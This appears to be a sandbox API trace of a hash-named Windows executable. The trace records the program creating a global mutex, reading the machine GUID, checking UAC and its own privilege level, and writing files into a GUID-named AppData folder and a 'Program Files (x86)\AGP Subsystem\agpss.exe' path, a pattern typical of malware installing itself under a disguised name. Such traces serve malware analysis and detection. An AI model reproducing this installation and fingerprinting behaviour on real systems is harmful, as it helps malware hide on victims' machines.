[0161.695] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0x80, wParam=0x1, lParam=0xb00d9) returned 0x0
[0161.696] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x501fe, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.697] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.697] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.697] GetSystemMetrics (nIndex=42) returned 0
[0161.697] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef60, nMaxCount=1 | out: lpString="") returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef60) returned 0x0
[0161.697] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.697] GetSystemMetrics (nIndex=42) returned 0
[0161.697] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef60, nMaxCount=1 | out: lpString="") returned 0
[0161.697] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef60) returned 0x0
[0161.697] GetWindowLongW (hWnd=0x7005c, nIndex=-16) returned 651100160
[0161.698] GetWindowLongW (hWnd=0x7005c, nIndex=-20) returned 65792
[0161.698] SetWindowLongW (hWnd=0x7005c, nIndex=-16, dwNewLong=583991296) returned 651100160
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7c, wParam=0xfffffff0, lParam=0x28efa8) returned 0x0
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7d, wParam=0xfffffff0, lParam=0x28efa8) returned 0x0
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.698] SetWindowLongW (hWnd=0x7005c, nIndex=-20, dwNewLong=65536) returned 65792
[0161.698] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7c, wParam=0xffffffec, lParam=0x28efa8) returned 0x0
[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x7d, wParam=0xffffffec, lParam=0x28efa8) returned 0x0
[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.699] SetWindowPos (hWnd=0x7005c, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1
[0161.699] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28efc8) returned 0x0
[0161.700] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x83, wParam=0x1, lParam=0x28efa0) returned 0x0
[0161.701] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28ed78 | out: lpwndpl=0x28ed78) returned 1
[0161.701] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28efc8) returned 0x0
[0161.701] GetClientRect (in: hWnd=0x7005c, lpRect=0x28ed28 | out: lpRect=0x28ed28) returned 1
[0161.701] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28ed28 | out: lpRect=0x28ed28) returned 1
[0161.701] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.702] RedrawWindow (hWnd=0x7005c, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1
[0161.702] GetSystemMenu (hWnd=0x7005c, bRevert=0) returned 0x402a7
[0161.702] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28f000 | out: lpwndpl=0x28f000) returned 1
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf020, uEnable=0x1) returned 1
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf030, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf060, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf120, uEnable=0x0) returned 0
[0161.702] EnableMenuItem (hMenu=0x402a7, uIDEnableItem=0xf000, uEnable=0x1) returned 1
[0161.702] ShowWindow (hWnd=0x7005c, nCmdShow=2) returned 0
[0161.702] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28f074) returned 0x0
[0161.703] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28ee24 | out: lpwndpl=0x28ee24) returned 1
[0161.703] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28f074) returned 0x0
[0161.703] GetClientRect (in: hWnd=0x7005c, lpRect=0x28edd4 | out: lpRect=0x28edd4) returned 1
[0161.704] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28edd4 | out: lpRect=0x28edd4) returned 1
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.704] GetWindowTextLengthW (hWnd=0x7005c) returned 0
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0
[0161.704] GetSystemMetrics (nIndex=42) returned 0
[0161.704] GetWindowTextW (in: hWnd=0x7005c, lpString=0x28ef70, nMaxCount=1 | out: lpString="") returned 0
[0161.704] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x1, lParam=0x28ef70) returned 0x0
[0161.705] SendMessageW (hWnd=0x7005c, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0161.705] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0
[0161.706] GetWindowThreadProcessId (in: hWnd=0x7005c, lpdwProcessId=0x28eddc | out: lpdwProcessId=0x28eddc) returned 0x5c0
[0161.706] GetCurrentThreadId () returned 0x5c0
[0161.707] RegisterClipboardFormatW (lpszFormat="WindowsForms12_ThreadCallbackMessage") returned 0xc1d4
[0161.708] PostMessageW (hWnd=0x7005c, Msg=0xc1d4, wParam=0x0, lParam=0x0) returned 1
[0161.723] OleInitialize (pvReserved=0x0) returned 0x0
[0161.724] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x28f190 | out: lplpMessageFilter=0x28f190*=0x0) returned 0x0
[0161.725] PeekMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x28f164) returned 1
[0161.726] IsWindowUnicode (hWnd=0x7005c) returned 1
[0161.727] GetMessageW (in: lpMsg=0x28f164, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x28f164) returned 1
[0161.728] TranslateMessage (lpMsg=0x28f164) returned 0
[0161.728] DispatchMessageW (lpMsg=0x28f164) returned 0x0
[0161.737] GetFocus () returned 0x0
[0161.737] ShowWindow (hWnd=0x7005c, nCmdShow=0) returned 1
[0161.737] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x18, wParam=0x0, lParam=0x0) returned 0x0
[0161.737] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x46, wParam=0x0, lParam=0x28ec2c) returned 0x0
[0161.738] GetWindowPlacement (in: hWnd=0x7005c, lpwndpl=0x28e9dc | out: lpwndpl=0x28e9dc) returned 1
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x47, wParam=0x0, lParam=0x28ec2c) returned 0x0
[0161.738] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e98c | out: lpRect=0x28e98c) returned 1
[0161.738] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e98c | out: lpRect=0x28e98c) returned 1
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0xd, wParam=0x104, lParam=0x4ccc658) returned 0x0
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x5, wParam=0x1, lParam=0x0) returned 0x0
[0161.738] CallWindowProcW (lpPrevWndFunc=0x76f325dd, hWnd=0x7005c, Msg=0x3, wParam=0x0, lParam=0x83008300) returned 0x0
[0161.738] GetClientRect (in: hWnd=0x7005c, lpRect=0x28e9b8 | out: lpRect=0x28e9b8) returned 1
[0161.738] GetWindowRect (in: hWnd=0x7005c, lpRect=0x28e9b8 | out: lpRect=0x28e9b8) returned 1
[0161.927] CoTaskMemAlloc (cb=0x20c) returned 0x766c10
[0161.927] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x766c10, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe")) returned 0x5f
[0161.927] CoTaskMemFree (pv=0x766c10)
[0161.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x28e790, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a
[0161.928] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x28e818, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a
[0161.929] SetCurrentDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop")) returned 1
[0162.007] FindResourceExA (hModule=0x0, lpType=0xa, lpName=0x1, wLanguage=0x0) returned 0x422048
[0162.018] LoadResource (hModule=0x0, hResInfo=0x422048) returned 0x422058
[0162.028] SizeofResource (hModule=0x0, hResInfo=0x422048) returned 0x15f30
[0162.039] LockResource (hResData=0x422058) returned 0x422058
[0165.603] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Global\\{7492bd48-e55d-4165-b6f8-ba286e7dc450}") returned 0x238
[0165.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SOFTWARE\\Microsoft\\Cryptography", cchWideChar=31, lpMultiByteStr=0x28ec60, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SOFTWARE\\Microsoft\\CryptographyqÛe6", lpUsedDefaultChar=0x0) returned 31
[0165.926] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x20119, phkResult=0x28ed04 | out: phkResult=0x28ed04*=0x23c) returned 0x0
[0166.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MachineGuid", cchWideChar=11, lpMultiByteStr=0x28ec50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MachineGuidqag6", lpUsedDefaultChar=0x0) returned 11
[0166.031] RegQueryValueExA (in: hKey=0x23c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x28ecfc, lpData=0x0, lpcbData=0x28ed00*=0x0 | out: lpType=0x28ecfc*=0x1, lpData=0x0, lpcbData=0x28ed00*=0x25) returned 0x0
[0166.032] CoTaskMemFree (pv=0x0)
[0166.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MachineGuid", cchWideChar=11, lpMultiByteStr=0x28ec50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MachineGuidqag6", lpUsedDefaultChar=0x0) returned 11
[0166.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x28beb04, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0
[0166.032] RegQueryValueExA (in: hKey=0x23c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x28ecfc, lpData=0x28ec24, lpcbData=0x28ed00*=0x25 | out: lpType=0x28ecfc*=0x1, lpData="b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6", lpcbData=0x28ed00*=0x25) returned 0x0
[0166.051] RegCloseKey (hKey=0x23c) returned 0x0
[0166.081] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28ecbc | out: phkResult=0x28ecbc*=0x23c) returned 0x0
[0166.082] RegQueryValueExW (in: hKey=0x23c, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x28ecd4, lpData=0x0, lpcbData=0x28ecd0*=0x0 | out: lpType=0x28ecd4*=0x4, lpData=0x0, lpcbData=0x28ecd0*=0x4) returned 0x0
[0166.083] RegQueryValueExW (in: hKey=0x23c, lpValueName="EnableLUA", lpReserved=0x0, lpType=0x28ecd4, lpData=0x28ecc0, lpcbData=0x28ecd0*=0x4 | out: lpType=0x28ecd4*=0x4, lpData=0x28ecc0*=0x1, lpcbData=0x28ecd0*=0x4) returned 0x0
[0166.084] GetCurrentProcess () returned 0xffffffff
[0166.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x28eca0 | out: TokenHandle=0x28eca0*=0x240) returned 1
[0166.092] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28eca0 | out: TokenInformation=0x0, ReturnLength=0x28eca0) returned 0
[0166.093] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x72f620
[0166.093] GetTokenInformation (in: TokenHandle=0x240, TokenInformationClass=0x8, TokenInformation=0x72f620, TokenInformationLength=0x4, ReturnLength=0x28eca0 | out: TokenInformation=0x72f620, ReturnLength=0x28eca0) returned 1
[0166.094] LocalFree (hMem=0x72f620) returned 0x0
[0166.096] DuplicateTokenEx (in: hExistingToken=0x240, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28eca8 | out: phNewToken=0x28eca8*=0x244) returned 1
[0166.097] CheckTokenMembership (in: TokenHandle=0x244, SidToCheck=0x28bf3a8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28ecb8 | out: IsMember=0x28ecb8) returned 1
[0166.097] CloseHandle (hObject=0x244) returned 1
[0166.106] GetCurrentProcess () returned 0xffffffff
[0166.146] CoTaskMemAlloc (cb=0x20c) returned 0x7695d8
[0166.146] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7695d8 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0
[0166.146] CoTaskMemFree (pv=0x7695d8)
[0166.146] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x28e714, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22
[0166.148] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6", nBufferLength=0x105, lpBuffer=0x28e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6", lpFilePart=0x0) returned 0x47
[0166.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e970) returned 1
[0166.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x28ec34 | out: lpFileInformation=0x28ec34*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xd4dfffa0, ftLastAccessTime.dwHighDateTime=0x1d8a8be, ftLastWriteTime.dwLowDateTime=0xd4dfffa0, ftLastWriteTime.dwHighDateTime=0x1d8a8be, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0166.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e96c) returned 1
[0166.150] CreateDirectoryW (lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6"), lpSecurityAttributes=0x0) returned 1
[0166.192] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", nBufferLength=0x105, lpBuffer=0x28e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", lpFilePart=0x0) returned 0x4f
[0166.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9e8) returned 1
[0166.192] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\run.dat"), fInfoLevelId=0x0, lpFileInformation=0x28ecac | out: lpFileInformation=0x28ecac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9e4) returned 1
[0166.193] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", nBufferLength=0x105, lpBuffer=0x28e68c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat", lpFilePart=0x0) returned 0x4f
[0166.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28eba4) returned 1
[0166.194] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\run.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\run.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x244
[0166.195] GetFileType (hFile=0x244) returned 0x1
[0166.195] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28eba0) returned 1
[0166.195] GetFileType (hFile=0x244) returned 0x1
[0166.196] WriteFile (in: hFile=0x244, lpBuffer=0x28c05a8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x28ec28, lpOverlapped=0x0 | out: lpBuffer=0x28c05a8*, lpNumberOfBytesWritten=0x28ec28*=0x8, lpOverlapped=0x0) returned 1
[0166.198] CloseHandle (hObject=0x244) returned 1
[0166.281] CoTaskMemAlloc (cb=0x20c) returned 0x7695d8
[0166.281] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7695d8 | out: pszPath="C:\\Program Files (x86)") returned 0x0
[0166.285] CoTaskMemFree (pv=0x7695d8)
[0166.285] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x28e76c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16
[0166.353] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0", nBufferLength=0x105, lpBuffer=0x28e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0", lpFilePart=0x0) returned 0x5a
[0166.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28ea18) returned 1
[0166.354] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\B9C8F16E-2E51-4052-9ECB-F86AE5D96EF6\\Exceptions\\1.2.2.0" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\b9c8f16e-2e51-4052-9ecb-f86ae5d96ef6\\exceptions\\1.2.2.0"), fInfoLevelId=0x0, lpFileInformation=0x28ecdc | out: lpFileInformation=0x28ecdc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0166.354] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28ea14) returned 1
[0167.359] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem", nBufferLength=0x105, lpBuffer=0x28e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem", lpFilePart=0x0) returned 0x24
[0167.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.360] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9a8) returned 1
[0167.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)" (normalized: "c:\\program files (x86)"), fInfoLevelId=0x0, lpFileInformation=0x28ec6c | out: lpFileInformation=0x28ec6c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0167.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9a4) returned 1
[0167.361] CreateDirectoryW (lpPathName="C:\\Program Files (x86)\\AGP Subsystem" (normalized: "c:\\program files (x86)\\agp subsystem"), lpSecurityAttributes=0x0) returned 1
[0167.384] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7b4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x28e9f4) returned 1
[0167.385] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe"), fInfoLevelId=0x0, lpFileInformation=0x28ecb8 | out: lpFileInformation=0x28ecb8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0167.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x28e9f0) returned 1
[0167.385] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", nBufferLength=0x105, lpBuffer=0x28e7ec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe", lpFilePart=0x0) returned 0x2e
[0167.386] DeleteFileW (lpFileName="C:\\Program Files (x86)\\AGP Subsystem\\agpss.exe" (normalized: "c:\\program files (x86)\\agp subsystem\\agpss.exe")) returned 0
